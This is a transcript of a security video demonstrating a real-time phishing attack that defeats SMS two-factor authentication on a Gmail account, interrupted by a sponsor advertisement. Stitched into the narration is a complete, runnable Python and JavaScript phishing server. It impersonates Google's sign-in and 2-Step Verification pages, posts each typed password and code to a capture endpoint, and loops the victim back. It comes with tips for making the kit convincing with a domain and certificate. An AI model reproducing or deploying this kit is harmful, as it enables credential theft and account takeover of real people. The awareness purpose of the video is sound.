How do hackers bypass two-factor authentication? How can you bypass two-factor authentication? Well, as a red teamer or a penetration tester, ethical hacker, or what have you, sometimes you don't even necessarily bypass two-factor authentication; you work within the constraints and restrictions that it presents to you as a hacker. In this video I'm going to show you one way that we might be able to do that. Obviously this video is for education's sake; it's for learning, it's for awareness, it's just for information, and hopefully we have a little bit of fun with it.

Say hello to Lewis Miller. This is our target, this is our victim, he is the individual. This is just a sock puppet account that I've created, again just for learning, just for that sandbox's sake. We're going to go ahead and distill, gloss over, or water down some of the things we might end up doing here, but Lewis Miller is our target. Now, I'm going to be hopping back and forth between the victim perspective and the attacker perspective, because we only have one screen here on YouTube, but I'll try to add a little video overlay to show you which perspective we're in.

So say Lewis Miller was doing his thing: he was taking a look at his email. There's nothing in there at the moment, but he is a Google Gmail user, and our attacker has maybe done some profiling; they've done some research, they've done their homework, and they've figured out Lewis's email address. They've figured out his profile picture, because that's obviously online on the internet, and the hacker knows that he has a Google account. Now the hacker, threat actor,
adversary wants to social engineer Lewis. He wants to fool him, deceive him, trick him into accidentally giving up his password and then everything they might need for the two-factor authentication step. So what that hacker might do is honestly just try to recreate the regular Google login page: entering the email address, lewislmiller76@gmail.com, and trying to make it look like everything Lewis would experience as he naturally logged in. Say he enters his password, yada yada yada, and then once he clicks on that button to log in, it prompts him for the two-factor authentication code, potentially sent to his phone via SMS, and that way the attacker is able to retrieve that information just as well. That's sort of like a watering hole attack.

Let me show you how we might set that up, because what's to stop me from just right-clicking on this page, choosing the Inspect option, and grabbing the bare-bones, basic, stupid, dumb HTML, all of the hypertext markup language this whole page is made up of? We could right-click and Edit as HTML to get all of this as something we could just copy and paste, and then if I move into a text editor and paste it all in here, they could scroll through this, look for any of the indicators of "Hi Lewis," and see what changes we might make to change this to John or Alice or Joe or anything, and then replace the profile picture image. We know that's probably going to be a GIF or a JPEG file, probably hosted by Google's user content; they can make that change super easily, and of course manipulate what email is displayed here.

Now, once the hacker has customized the HTML to be tailored and targeted toward the victim, they still aren't done, because right now it's just a flat HTML page. They probably want to add some other code at the very end, or hidden and tucked away somehow, so they can actually collect the credentials that are typed into the form. I'll do this with some super simple, super dumb, easy JavaScript, again client-side code, that takes the input they fill in for their password and posts it to the web server so that we can keep track of that data.

Now once those HTML files have been crafted, manipulated, and modified to look like the victim's page, all the hacker wants to do is serve them publicly on the open internet. They want a web server, something that can catch and collect all the information that goes through it. I'm doing this in a super simple, crude, easy, rudimentary way: just a stupid, dumb little Python server here, done with Flask, to create routes for the login page and the two-factor authentication page and do its thing. Now I'll show you this: if we were to go ahead and run this, nice and easy, I am just going to be listening on localhost, on local port 5000, whatever. If you wanted to, of course, you could buy a domain to make this super realistic; you could spin it out on the open internet with, I don't know, ngrok, set up a matching HTTP scheme, or obviously have a self-signed certificate, and try to look as realistic as possible. But for demonstration's sake, look, we're doing it super easy.

Next, the hacker wants to create a phishing email. They want to create some bait, make a lure, something that will hook the user into thinking, "Oh no, there is a problem with my Google account and I need to check in and confirm my information, review access, and all those security things," with a little bit of urgency so they're willing to do it right then and there.
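The two-route capture server and the form-posting script described above, written out as an added example; this is not the video's own code. It uses only the Python standard library (wsgiref in place of Flask) so it runs with no dependencies. The victim name and the spelling of the email address come from the video's sock-puppet scenario; the route names, form field names, log format and the bare placeholder pages standing in for the cloned Google HTML are assumptions made here, and the passwords and codes used to exercise it are constructed sample input.

```python
import io
import json
import html
import urllib.parse
from http import HTTPStatus
from wsgiref.simple_server import make_server

# Target details from the video's sock-puppet scenario. The email spelling,
# route names, form field names and log format are assumptions made here.
VICTIM_NAME = "Lewis Miller"
VICTIM_EMAIL = "lewislmiller76@gmail.com"

CAPTURED = []  # records the attacker watches while logging in as the victim in parallel

# Client-side capture: intercept the submit, POST the typed value to /collect,
# then move the victim on to the next page. The video does the same job with
# a small inline script instead of a normal form action.
CAPTURE_JS = """
<script>
document.getElementById("f").addEventListener("submit", function (e) {
  e.preventDefault();
  var value = document.querySelector("input[name=value]").value;
  fetch("/collect", {method: "POST",
      headers: {"Content-Type": "application/x-www-form-urlencoded"},
      body: "stage=STAGE&value=" + encodeURIComponent(value)})
    .finally(function () { window.location = "NEXT"; });
});
</script>"""


def page(title, lead, input_type, stage, next_url):
    """A bare lookalike page; a real kit would reuse the cloned HTML and CSS."""
    return ("<!doctype html><html><head><title>" + html.escape(title) + "</title></head><body>"
            "<h2>" + html.escape(title) + "</h2><p>" + html.escape(lead) + "</p>"
            '<form id="f"><input type="' + input_type + '" name="value" autofocus>'
            '<button type="submit">Next</button></form>'
            + CAPTURE_JS.replace("STAGE", stage).replace("NEXT", next_url)
            + "</body></html>")


LOGIN_PAGE = page("Sign in", f"{VICTIM_NAME} <{VICTIM_EMAIL}>", "password", "password", "/2fa")
# After the code is submitted the victim is bounced back to the login page,
# which is the "stuck in a loop" behaviour the video describes.
OTP_PAGE = page("2-Step Verification", "Enter the code sent to your phone", "text", "otp", "/")


def respond(start_response, status, text):
    data = text.encode()
    start_response("%d %s" % (status.value, status.phrase),
                   [("Content-Type", "text/html; charset=utf-8"),
                    ("Content-Length", str(len(data)))])
    return [data]


def app(environ, start_response):
    """Three routes: the login clone, the 2FA clone, and the collection endpoint."""
    method, path = environ["REQUEST_METHOD"], environ["PATH_INFO"]
    if method == "GET" and path == "/":
        return respond(start_response, HTTPStatus.OK, LOGIN_PAGE)
    if method == "GET" and path == "/2fa":
        return respond(start_response, HTTPStatus.OK, OTP_PAGE)
    if method == "POST" and path == "/collect":
        size = int(environ.get("CONTENT_LENGTH") or 0)
        fields = dict(urllib.parse.parse_qsl(environ["wsgi.input"].read(size).decode()))
        record = {"stage": fields.get("stage", "?"), "value": fields.get("value", ""),
                  "src": environ.get("REMOTE_ADDR", "?")}
        CAPTURED.append(record)
        print("[capture]", json.dumps(record), flush=True)  # the attacker's live feed
        return respond(start_response, HTTPStatus.NO_CONTENT, "")
    return respond(start_response, HTTPStatus.NOT_FOUND, "Not found")


def latest(stage):
    """Most recent value captured for a stage ('password' or 'otp'), or None."""
    for record in reversed(CAPTURED):
        if record["stage"] == stage:
            return record["value"]
    return None


def simulate_request(method, path, body=""):
    """Drive the app in-process with no socket; returns (status line, body text)."""
    data = body.encode()
    environ = {"REQUEST_METHOD": method, "PATH_INFO": path, "REMOTE_ADDR": "127.0.0.1",
               "CONTENT_LENGTH": str(len(data)), "wsgi.input": io.BytesIO(data)}
    seen = {}
    chunks = app(environ, lambda status, headers: seen.setdefault("status", status))
    return seen["status"], b"".join(chunks).decode()


if __name__ == "__main__":
    # Listening on localhost:5000 as in the video; the phishing link points here.
    make_server("127.0.0.1", 5000, app).serve_forever()
```

Run it and browse to http://127.0.0.1:5000/. Every submission is appended to CAPTURED and printed as one JSON line, which is the feed the attacker watches while typing the same password and code into the real site in parallel. The fetch() completes before the page navigates, so the value is captured even though the form has no action, and the second page sends the victim back to the first, which is the loop described later in the video. As the video notes, a real engagement would put this behind a registered domain and a valid certificate, because the address bar is the one thing the cloned HTML cannot imitate.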
The hacker needs to be waiting and ready to get the password, send off a genuine, real two-factor authentication code from the real site, and then retrieve it so that they can log in rather than the victim. So again, just for the sake of demonstration, we're going to keep this super easy. I'm going to go ahead and send an email with an anonymous email service. If you wanted to, you could change the sender to, oh, "Google Security Team," blah blah blah; maybe you could change the email that it came from. Going to "To," of course we do want to send this to our victim, lewislmiller76@gmail.com, and now we want to craft the phishing email. Obviously, if this were real, they would do it with a little bit more professionalism; they'd make it super believable, they'd add the images, they'd make it look like a genuine, real email from Google. But ultimately we're going to keep it kind of simple and easy. Let me go ahead and create a link: let's say "please click here to confirm your account," and I will add a link to localhost on port 5000, where I'm serving that bait, that lure, that hook. Now we can go ahead and send the email. For demonstration's sake I'll put these side by side, and of course once I hit that send button we should see that fire off and land in Lewis's inbox. There it is, cool, perfect. Now Lewis has this security alert: "We noticed some suspicious activity on your Google account; please click here to confirm your account information." So let's go ahead and click on that link as the poor, innocent, silly, naive user that we are.
Let's go ahead and enter our password. Remember, I am the real Lewis right now; I am genuinely the victim. Let's say I type in my password, blah blah blah; I don't use a password manager because I'm stupid and don't do those security things. Now bear in mind, the actual hacker here wants to be sitting and waiting, ready to catch it: once this user actually clicks on that lure and starts to type in the password, they want to be able to genuinely, legitimately log in as Lewis, as the victim, so that a real two-factor authentication code gets sent to his device. Let's do this side by side so you can see both the victim and the attacker at the same time. Say on the right-hand side is the victim, poor Lewis, who just typed in his password, and on the left-hand side is the attacker, waiting and ready to catch the password as he clicks the Next button. I'll fire it off here, and there it is: we can see we have exfiltrated and stolen Lewis's real password, and now he's going to be waiting for a real, genuine two-factor authentication code sent to his cell phone. I've got that ready right here, and let's go be the poor victim Lewis.

But wait, before we go any further with our social engineering and all the pentesty hacker stuff that we're up to, I do want to give a little bit of love to today's sponsor, PlexTrac, because hey, you might just be doing some of this awesome stuff in your latest pen test and you want to make it super easy to write the report. Take it away, PlexTrac.

When you're performing a penetration test, you're in the zone, you're hacking away and you're having fun gathering findings, beating up vulnerabilities, and earning domain admin, but you might be dreading the work that comes after: you have to write a report. But writing a pen test report doesn't have to be dull, boring, long, and tedious; in fact, it can be a breeze. You don't even have to worry about your report, because PlexTrac can handle it for you. If you aren't familiar, PlexTrac is the premier cybersecurity reporting and collaboration platform that makes penetration testers, red teamers, and cybersecurity teams more efficient, effective, and proactive. PlexTrac removes the pain of reporting and lets you collaborate between both red and blue teams for effective purple teaming and faster remediation. The PlexTrac platform lets you easily aggregate findings, pull in reusable content from write-up databases and content libraries, and track and measure engagement progress in real time. Import assets from CSV files, or Nmap, or Nessus, and so many others of your favorite tools; with over 25 integrations you can streamline your reporting and collaboration process right into your existing workflow. You can do even faster testing with PlexTrac's runbooks, and show the impact to managers and leadership with PlexTrac's analytics and visualizations. Within minutes you can have your pen test report done and dusted, all with your team's logo and details, and then sent off to the client. Spend more time hacking and less time reporting. Learn how you can boost your team's efficiency by 30 percent and cut reporting time by up to 65 percent with PlexTrac. Seriously, check out PlexTrac; I have great colleagues and peers that use PlexTrac every day for reporting. Get started with my link below in the video description and let you and your team get back to hacking. Huge thanks to PlexTrac for sponsoring this video.

Back in action here. Say that our hacker had successfully stolen, exfiltrated, and gotten the password for the victim, the target, Lewis. Now in a separate window, a separate session, someone that is not logged into a Google account, just a guest here, let's say they were going to try and log in in real time, literally trying to log in to Lewis's account: hit Next to log in, enter the password that they have now discovered, and then have a real and genuine two-factor authentication code sent to Lewis's phone. So I'm going to go ahead and click Next here, and we'll see that Google has genuinely sent a code to my phone, and I have Lewis's phone right here with me, and he's just gotten that text message. So now I'm going to go ahead and click into this; I'll see that the Google code is 8 5 5 0 0 1. Now let's go back to the victim perspective here: say I'm Lewis and I enter in the code 855001, and over on the left-hand side the attacker is ready and waiting to retrieve this, because once they hit Next they're going to be redirected back to the original login prompt. Nothing's going to happen for Lewis, but the attacker has now received that two-factor authentication code and they can successfully log in with their login. Let me go ahead and finish this, and now Lewis has been successfully logged in for this threat actor. Take a look: we are in fact Lewis, we can go manage our Google account, and with that we have an account takeover. We can do whatever we want.
Now we can go take a look at their contacts, we can go see what they're up to on YouTube, we can go into their Google Drive files, we can go into their Gmail. We can honestly, I don't know, take out all of their personal private data: locations they've been to, things they've been up to. We can honestly just do a quick Google Takeout and dig into their personal information: their birthday, what cards, what things they might have saved, other passwords or addresses hooked up to their profile, anything. It is a full account takeover, a compromise of their identity, with their Google account connected to so much.

And listen, hey, this is all just for education's sake; this is all just for the demo, just for the showmanship, just for fun. Obviously, yeah, there could be some hiccups here. Google has a much more secure option, like "hey, press the button on your phone" with the Google connection or whatever; it's not always going to be SMS-based text messages for two-factor authentication. But that does go to show just how potentially insecure two-factor authentication over SMS and text messages can sometimes be. And at the end of the day, if you have an attacker, a hacker, threat actor, adversary, that's just willing to sit idly by, waiting for the user to click on their phishing link and actually submit their password, well, they can then streamline that into the same thread, parallel to the user: send in that password, have a genuine two-factor code sent, and then retrieve that to really log in as them, while the victim is none the wiser, trapped in a loop trying to log in and getting sent back.

Anyway, I hope this was fun, I hope this was cool, I hope this was a little eye-opening to see, wow, that actually happening in real time, and seeing what could be done for stealing and tracking down those two-factor authentication codes, and how hackers might still be able to compromise your account even if you have two-factor authentication turned on. Anyway, thanks so much for watching. Hope you enjoyed. Like, comment, subscribe; I'll see you in the next video.